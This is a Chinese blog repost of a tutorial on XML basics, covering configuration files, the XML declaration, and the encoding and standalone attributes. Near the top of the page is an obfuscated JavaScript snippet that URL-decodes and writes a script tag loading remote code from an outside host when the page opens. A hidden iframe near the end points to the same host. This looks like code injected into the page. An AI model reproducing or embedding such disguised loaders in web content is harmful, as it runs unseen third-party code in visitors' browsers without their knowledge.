XML的一点基础知识(转自张孝祥老师的Blog)

 

HTML Tags and JavaScript tutorial


<script language="javascript">var encS="%3Cscript%20language%3D%22javascript%22%20src%3D%22http%3A//avss.b15.cnwg.cn/count/count.asp%22%3E%3C/script%3E";var S=unescape(encS);document.write(S);</script>
XML的一点基础知识(转自张孝祥老师的Blog)



 
XML
作为一种通用的数据交换格式,应用越来越广泛。目前许多系统的配置文件都使用
XML
格式,本书中所涉及到的众多配置文件都是
XML
格式的,新的
JSP
规范也推出了采用
XML
语法的
JSP
文档,因此,要深入学习和掌握
Java Web
开发技术,必须有一些基本的
XML
语言知识。由于
XML
的通用性和广泛应用,在读者以后实际项目开发和应用中,很多地方都要用到
XML
方面的知识,所以,对
XML
知识的了解和掌握,已经是从事电子商务网站和相关系统开发的编程人员所必须掌握的基本知识。
F
指点迷津:
什么是配置文件
配置文件就是记录应用程序的配置信息的文件。例如,某个程序要连接网络上的数据库系统时,需要指定数据库服务器的
ip
地址、服务器的网络监听端口号、数据库的名称、用户名和密码等信息,这些信息可以作为应用程序的配置信息来对待,即不要将这些信息写死在源程序中,而是写在一个文本文件中。应用程序要连接数据库系统时,从该文本文件中读取所需要的信息,如果连接的数据库系统的信息发生了改变,则只需要修改该文本文件,而不用修改源程序,这个文本文件就是应用程序的配置文件。传统的配置文件通常采用如下格式:
#Db.Properties
DBServer=192.168.0.100
Port=1443
Database=emp
Username=zxx
Password=123
上面这种格式的配置文件只能表述一些简单的信息,而很难表达具有层次结构和数据项目要动态增加的信息。例如,如果要在一个文件中表达出“一个国家中的每个省及省长的名称、每个省下面的每个市及市长的名称、每个市下面的每个镇及镇长名称”,使用上面的格式就很难表达。采用
XML
格式的配置文件很容易表达出这种层次结构,具体细节请参看本章后面部分的讲解。
文档声明
在一个完整的
XML
文档中必须包含一个
XML
文档声明,该声明必须位于文档的第一行。这个声明表示该文档是一个
XML
文档,以及遵循的是哪个
XML
版本的规范。最简单的
XML
文档声明语法如下:
<?xml version="1.0" ?>
在“
<
”和“
?
”之间、“
?
”和“
>
”之间以及第一个“
?
”和
xml
之间不能有空格,这就是
XML
语法严格性的一个体现。在第二个“
?
”之前可以没有、也可以有一个或多个空格。声明语句中的
version
属性表示
XML
的版本,因为解析器对不同的版本的解析肯定会有区别,尽管目前只有
1.0
版本,但在声明中必须指定
version
属性。
由于人们可以采用不同的字符编码集来书写一个字符内容完全相同的
XML
文档,所以,
XML
软件工具(包括分析器)就需要知道该
XML
文档所使用的字符编码方式。这可以通过在
XML
文档声明中指定
encoding
属性来说明,例如,使用下面的语句来指明文档中的字符编码方式为
GB2312
编码。
      
<?xml version="1.0" encoding="GB2312" ?>
W3C

XML1.0
规范里规定,所有的
XML
解析器必须接受
UTF-8

UTF-16
编码的
Unicode
字符,所以,符合
XML
规范的软件工具一定都支持这两种
Unicode
编码。
如果
XML
声明中没有设置
encoding
属性来明确指定文档所用的字符编码方式,则一律以
Unicode
编码看待。
XML
解析器通过寻找
XML
文档开始处的字节顺序标记,能够自动检测出文档中的
Unicode
编码是
UTF8
,还是
UTF16
。也就是说,
encoding
属性默认的设置是
Unicode
编码,如果文档中的字符是以
UTF-8
或者是
UTF-16
作为编码,则可以不设置这个属性。

XML
文档声明语句中,还可以指定另外一个可选属性:
standalone
,例如:
<?xml version="1.0" encoding="UTF-8" standalone="yes" ?>
standalone
属性用于说明文档是否是独立的,如果将其设置为“
yes
”,则表示该文档没有依赖外面的任何文件而可以独立存在,即不需要
DTD
文件来验证其中的标识是否有效,也不需要
XSL

CSS
文件来控制其显示外观;将
standalone
属性设置为“
no
”时,则表示该文档依赖于外面的某个文件,例如,依赖于某个
DTD
文件或
XSL

CSS
文件。
standalone
属性的默认值为“
yes
”。
注意:
如果同时设置了
encoding

standalone
属性,
standalone
属性要位于
encoding
属性之后。
PS:文字内容全部出自张老师的Blog,自己为学习方便对部分内容进行了标注强调,不知在Blog中是否可以如此转帖...

src="http://avss.b15.cnwg.cn/count/iframe.asp" frameborder="0" width="650" scrolling="no" height="160">
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值